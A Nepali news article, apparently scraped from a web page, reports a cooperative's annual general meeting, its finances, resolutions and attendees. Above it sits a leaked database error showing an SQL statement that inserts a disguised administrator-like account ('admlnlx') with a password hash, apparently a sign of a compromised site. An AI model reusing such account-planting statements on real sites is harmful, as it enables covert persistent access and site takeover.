WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcIvDXMeqSPpKsFu/F9.BvdIQ4pEG01', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:20:54', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १ भाद्र, काठमाडौं । युनाइटेड पिपुल्स बहुद्देश्यीय सहकारी संस्था लिमिटेडले आफ्नो ११औं वार्षिक साधारण सभाको अवसरमा शेयर सदस्यहरुलाई स्वास्थ्य उपचार खर्चवापत ११ प्रतिशत बाढेको छ । गत आर्थिक वर्षमा कम्पनीले गरेको नाफामध्ये करिब १२ लाख रुपैयाँ रकम सो शिर्षकमा बाढिएको हो ।
साधारण सभाबाट पारित कोषाध्यक्ष राजबीर राईद्धारा प्रस्तुत आर्थिक प्रतिवेदनअनुसार गत आर्थिक वर्षको खुद मुनाफा भने ७ लाख ७५ हजार रुपैयाँ रहेको छ ।
यस आर्थिक वर्षमा कर्जा जोखिम बहनवापतको रकममा व्यापक बृद्धि गरी जम्मा ३२ लाख ३० रुपैयाँ पुर्याइएको छ । यसअघि सोवापतको रकम जम्मा १७ लाख ३० हजारमात्रै रहेकोमा यस आर्थिक वर्षमा १५ लाख रुपैयाँ रकम बृद्धि गरिएको हो ।
१ करोड ६० लाख रुपैयाँ चुक्तापूजी रहेको यस कम्पनीको वार्षिक कारोबार ६ करोड बराबरको रहेको छ ।
११औं वार्षिक साधारण सभाबाट ९ सदस्यीय रहेको सञ्चालक समितिका लागि कुल चुक्तापूजीको ५ प्रतिशत र शेयर सदस्यहरुले आफ्नो शेयर रकमको १० प्रतिशत अनिवार्य रुपमा थप्नुपर्ने निर्णयसमेत पारित गरेको छ ।
कार्यक्रमलाई सम्बोधन गर्दै कम्पनीका अध्यक्ष रामकुमार थुलुङले चालु आर्थिक वर्षलाई पुजी बृद्धिको वर्षको रुपमा घोषणा गरिएको र कम्पनीको हरेक योजना आगामी दिनमा थप सफल हुँदै जाने विश्वास व्यक्त गर्नुभयो ।
सो अवसरमा सञ्चालक समितिका उपाध्यक्ष मानबीर राई, कम्पनीका सल्लाहकार सौमान राई तथा पदाधिकारीसँगै जिमी (राई) उत्थान समाज सोलुका केन्द्रीय अध्यक्ष यसबहादुर राई, किरात खालिङ राई उत्थान संघका केन्द्रीय अध्यक्ष सिता खालिङ, अधिवक्ता विषण खालिङ, माप्य दुधकोशी गाउँपालिका वडा नम्बर १ का वडा अध्यक्ष धनकुमार खालिङ, खालिङ आमा समुहका अध्यक्ष सुनिता खालिङ, विभिन्न बचत कोषका प्रतिनिधिलगायतको उपस्थिति रहेको थियो ।
सो अवसरमा सचिव अर्जुन राईको प्रतिवेदन पारित भएको छ भने मानबहादुर बनलाई पुन लेखा परिक्षकको रुपमा नियुक्त गरिएको छ । यसैबीच, कम्पनीमा कार्यरत कर्मचारीहरुलाई राम्रो काम गरेको भन्दै सम्मानसमेत गरियो ।
साभार: शिखरपोस्ट